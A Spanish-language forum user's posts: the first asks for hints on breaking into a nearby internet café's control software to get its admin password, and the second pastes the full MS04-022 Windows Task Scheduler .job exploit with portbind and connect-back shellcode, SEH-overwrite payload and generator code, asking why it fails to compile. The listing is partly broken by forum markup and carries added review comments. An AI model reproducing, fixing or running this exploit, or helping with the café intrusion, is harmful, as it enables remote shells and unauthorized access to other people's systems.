
Mensajes - edipo

#1
HOLA A TODOS

ESTE TEMA ME HA INTERESADO MUCHO, Y NO CON EL FIN DE MOLESTAR SINO DE APRENDER, Y ME HA SURGIDO UNA PREGUNTA: EN MI CUADRA HAY UN CIBER CAFÉ Y TIENEN OTRO PROGRAMA, SE LLAMA CONTROLADOR DE CIBER, Y LA PÁGINA DONDE SE ENCUENTRA ES www.cbm.com.ar
LO HE INTENTADO CON LOS EXPLOITS QUE AQUÍ APARECEN; ADEMÁS HE ANALIZADO EL PROGRAMA Y LE HE BUSCADO EL ARCHIVO DONDE SE ENCUENTRA EL PASS DE ADMINISTRADOR, PERO NADA. ¿ALGUIEN ME PUEDE COLABORAR CON ESTO? NO QUIERO QUE ME DIGAN CÓMO, SINO QUE ME DEN UNA IDEA.

A TODOS GRACIAS.........................
#2
a todos: yo también he querido compilar en Dev-C++ y me da ciertos errores, como por ejemplo

C:\DEV-C_~1\Bin\ld.exe: warning: cannot find entry symbol _WinMainCRTStartup; defaulting to 00401000
C:\DOCUME~1\ESTACI~1\CONFIG~1\Temp\ccE1caaa.o: In function `usage':
//c/dev-c_~1/include/objc/ms0402~1.c:233: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:234: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:235: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:236: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:237: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:238: undefined reference to `exit'
C:\DOCUME~1\ESTACI~1\CONFIG~1\Temp\ccE1caaa.o: In function `main':
//c/dev-c_~1/include/objc/ms0402~1.c:243: undefined reference to `__main'
//c/dev-c_~1/include/objc/ms0402~1.c:249: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:250: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:254: undefined reference to `atoi'
//c/dev-c_~1/include/objc/ms0402~1.c:257: undefined reference to `fopen'
//c/dev-c_~1/include/objc/ms0402~1.c:259: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:260: undefined reference to `exit'
//c/dev-c_~1/include/objc/ms0402~1.c:264: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:265: undefined reference to `fseek'
//c/dev-c_~1/include/objc/ms0402~1.c:267: undefined reference to `atoi'
//c/dev-c_~1/include/objc/ms0402~1.c:268: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:270: undefined reference to `htons@4'
//c/dev-c_~1/include/objc/ms0402~1.c:271: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:272: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:273: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:274: undefined reference to `fseek'
//c/dev-c_~1/include/objc/ms0402~1.c:279: undefined reference to `inet_addr@4'
//c/dev-c_~1/include/objc/ms0402~1.c:281: undefined reference to `htons@4'
//c/dev-c_~1/include/objc/ms0402~1.c:282: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:283: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:284: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:285: undefined reference to `fseek'
//c/dev-c_~1/include/objc/ms0402~1.c:290: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:291: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:292: undefined reference to `fclose'

entonces que si el exploit es este
/* HOD-ms04022-task-expl.c:
*
* (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
*
* Exploit version 0.1 coded by
*
*
*                 .::[ houseofdabus ]::.
*
*
* [at inbox dot ru]
* -------------------------------------------------------------------
* Tested on:
*    - Internet Explorer 6.0 (SP1) (iexplore.exe)
*    - Explorer (explorer.exe)
*    - Windows XP SP0, SP1
*
* -------------------------------------------------------------------
* Compile:
*    Win32/VC++  : cl HOD-ms04022-task-expl.c
*    Win32/cygwin: gcc HOD-ms04022-task-expl.c -lws2_32.lib
*    Linux       : gcc -o HOD-ms04022-task-expl HOD-ms04022-task-expl.c
*
* -------------------------------------------------------------------
* Command Line Parameters/Arguments:
*
*   HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP]
*
*   Shellcode:
*        1 - Portbind shellcode
*        2 - Connectback shellcode
*
* -------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms04022-task-expl.exe expl.job 1 7777
*
* (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
*
* --- Coded by .::[ houseofdabus ]::. ---
*
*
* [*] Shellcode: Portbind, port = 7777
* [*] Generate file: expl.job
*
* C:\>
*
* start IE -> C:\
*
* C:\>telnet localhost 7777
* Microsoft Windows XP [Версия 5.1.2600]
* (С) Корпорация Майкрософт, 1985-2001.
*
* C:\Documents and Settings\v.X\Рабочий стол>
*
    * -------------------------------------------------------------------
    *
    *   This is provided as proof-of-concept code only for educational
    *   purposes and testing by authorized individuals with permission to
    *   do so.
    *
    */

    /* #define _WIN32 */

    #include <stdio.h>
    #include <stdlib.h>
    #include "winsock.h"
    #ifdef _WIN32
    #pragma comment(lib,"ws2_32")


    #else
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #endif



    unsigned char jobfile[] =

    /* job header */
    "\x01\x05\x01\x00\xD9\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
    "\xFF\xFF\xFF\xFF\x46\x00\x92\x00\x00\x00\x00\x00\x3C\x00\x0A\x00"
    "\x20\x00\x00\x00\x00\x14\x73\x0F\x00\x00\x00\x00\x03\x13\x04\x00"
    "\xC0\x00\x80\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00"

    /* length */
    "\x11\x11"

    /* garbage C:\... */
    /* unicode */
    "\x43\x00\x3A\x00\x5C\x00\x61\x00"
    "\x2E\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
    "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"

    "\x1E\x82\xDC\x77"

    /* 0x77dc821e - pop reg, pop reg, ret (advapi32.dll) */
    /* for Win2k use jmp ebx or call ebx  */

    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
    "\x80\x31\x31\x80" /* generate exception */

    "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
    "\x90\x90";



    /* portbind shellcode */
    unsigned char portbindsc[] =
    "\x90\x90"
    "\x90\x90\xEB\x06" /* overwrite SEH-frame */
    "\x90\x90"
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"

    "\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
    "\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
    "\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
    "\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
    "\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
    "\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
    "\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
    "\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
    "\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
    "\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70"
    "\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6"
    "\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e"
    "\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83"
    "\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32"
    "\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59"
    "\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50"
    "\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50"
    "\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14"
    "\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc"
    "\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c"
    "\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33"
    "\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44"
    "\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d"
    "\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50"
    "\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55"
    "\x28\xff\x55\x0c";



    /* connectback shellcode */
    unsigned char connectbacksc[] =
    "\x90\x90"
    "\x90\x90\xEB\x06" /* overwrite SEH-frame */
    "\x90\x90"
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"

    "\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
    "\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
    "\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
    "\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
    "\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
    "\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
    "\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
    "\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
    "\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
    "\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa"
    "\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02"
    "\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83"
    "\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83"
    "\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc"
    "\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8"
    "\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90"
    "\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50"
    "\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8"
    "\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56"
    "\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa"
    "\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab"
    "\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50"
    "\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff"
    "\x77\x38\xff\x55\x20\xff\x55\x0c";



    /* use this form
    unsigned char sc[] =
    "\x90\x90"
    "\x90\x90\xEB\x06" - overwrite SEH-frame
    "\x90\x90"
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"

    "... code ...";
    */

    /* Four zero bytes; main() writes them to the output file directly after
     * the selected payload array. */
    unsigned char endofjob[] = "\x00\x00\x00\x00";

    /*
     * In-place patch helpers for the two payload arrays. Each one stores a
     * value at a hard-coded byte offset from buf:
     *   SET_PORTBIND_PORT     - unsigned short at buf + 316 (300 + 16)
     *   SET_CONNECTBACK_IP    - unsigned long  at buf + 299 (283 + 16)
     *   SET_CONNECTBACK_PORT  - unsigned short at buf + 306 (290 + 16)
     * main() passes the results of htons() and inet_addr(), so the stored
     * values are whatever those calls return.
     *
     * NOTE(review): there is no bounds check; the offsets are only valid for
     * arrays at least that long. The store goes through a cast pointer at an
     * offset that is not guaranteed to be aligned for the target type, and
     * `unsigned long` is not 4 bytes on every platform.
     */
    #define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300+16)) = (port)
    #define SET_CONNECTBACK_IP(buf, ip)     *(unsigned long *)(((buf)+283+16)) = (ip)
    #define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+290+16)) = (port)

    /*
     * Print the command-line synopsis and the two accepted values of the
     * <shellcode> selector, then end the process with exit status 0.
     * This function does not return to its caller.
     *
     * prog: program name shown in the synopsis (main() passes argv[0]).
     */
    void
    usage(char *prog)
    {
        /* One call with adjacent string literals; output is identical to
         * printing the five lines separately. */
        printf("Usage:\n"
               "%s <file> <shellcode> <bind/connectback port> [connectback IP]\n"
               "\nShellcode:\n"
               "      1 - Portbind shellcode\n"
               "      2 - Connectback shellcode\n\n",
               prog);
        exit(0);
    }

    /*
     * Entry point of the file generator.
     *
     * Writes a crafted Task Scheduler .job file to the path given in argv[1]:
     * the fixed `jobfile` array, then one of two payload arrays chosen by
     * argv[2] (1 = portbindsc, anything else that passes the check =
     * connectbacksc), then the four bytes of `endofjob`. Finally it
     * back-patches a 16-bit length value at file offset 70, the position of
     * the bytes marked "length" in `jobfile`.
     *
     * Arguments (see usage()):
     *   argv[1]  output file path
     *   argv[2]  payload selector
     *   argv[3]  port number
     *   argv[4]  IPv4 address string, read only in the connect-back branch
     *
     * Returns 0. Every early-exit path also ends the process with status 0,
     * so a caller cannot tell failure from success by exit code.
     *
     * Context for readers: the banner names bulletin MS04-022 and the file
     * header lists Windows XP SP0/SP1 as the tested systems. The artifact
     * produced here is a .job file whose length field is set to cover the
     * whole appended payload; an implausibly large value in that field is the
     * anomaly this code creates (inferred from this listing - confirm against
     * the bulletin before relying on it for detection).
     *
     * NOTE(review): as shown in this listing the function does not compile:
     * two printf() string literals are split across lines (forum list-markup
     * artifact).
     */
    int
    main(int argc, char **argv)
    {
    /* NOTE(review): this local shadows the standard strlen() name; it holds
     * the 16-bit value written into the length field at the end. */
    unsigned short strlen;
    unsigned short port;
    unsigned long ip, sc;
    /* NOTE(review): fp2 is declared but never used in this function. */
    FILE *fp, *fp2;

    printf("\n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit\n\n");
    printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");

    /* usage() calls exit(0), so execution continues only with argc >= 4. */
    if (argc < 4) usage(argv[0]);

    /* atoi() gives no error indication; a non-numeric argument yields 0 and
     * a negative one wraps when stored in the unsigned `sc`. */
    sc = atoi(argv[2]);
    /* NOTE(review): sc == 0 passes this check and later takes the else
     * branch, which reads argv[4] even when argc == 4. */
    if ( ((sc == 2) && (argc < 5)) || (sc > 2)) usage(argv[0]);

    /* The output path comes straight from the command line; "wb" truncates
     * an existing file of that name. */
    fp = fopen(argv[1], "wb");
    if (fp == NULL) {
    printf("[-] error: can\'t create file: %s\n", argv[1]);
    exit(0);
    }

    /* header & garbage */
    /* sizeof - 1 drops the terminating NUL of the string literal. The
     * fwrite()/fseek() results are not checked anywhere in this function. */
    fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
    /* Position at byte 624 (39*16); the payload array is written from here. */
    fseek(fp, 39*16, SEEK_SET);

    /* The int from atoi() is narrowed to unsigned short without a range check. */
    port = atoi(argv[3]);
    /* The string literal below is broken across two lines in this listing. */
    printf("
  • Shellcode: ");
    if (sc == 1) {
    /* Patch the port into the payload array before it is written out. */
    SET_PORTBIND_PORT(portbindsc, htons(port));
    printf("Portbind, port = %u\n", port);
    fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp);
    fwrite(endofjob, 1, 4, fp);
    /* Back to offset 70, where the length value is written after the if/else. */
    fseek(fp, 70, SEEK_SET);
    /* calculate length (see header) */
    /* Divided by 2: presumably a count of 16-bit units - TODO confirm
     * against the .job format. */
    strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2;
    }
    else {
    /* inet_addr()'s return value is used without checking for its error
     * result. */
    ip = inet_addr(argv[4]);
    SET_CONNECTBACK_IP(connectbacksc, ip);
    SET_CONNECTBACK_PORT(connectbacksc, htons(port));
    printf("Connectback, port = %u, IP = %s\n", port, argv[4]);
    fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp);
    fwrite(endofjob, 1, 4, fp);
    /* Back to offset 70, where the length value is written after the if/else. */
    fseek(fp, 70, SEEK_SET);
    /* calculate length (see header) */
    /* Same formula as the other branch, using the connect-back array's size. */
    strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2;
    }

    /* The string literal below is broken across two lines in this listing. */
    printf("
  • Generate file: %s\n", argv[1]);
    /* Writes the two bytes of `strlen` in host byte order at the current
     * position (offset 70 after the fseek above). */
    fwrite(&strlen, 1, 2, fp);
    fclose(fp);

    return 0;
    }
por favor ayúdenme, soy algo nuevo y he leído tantos libros que siento que se me va a estallar el cerebro. gracias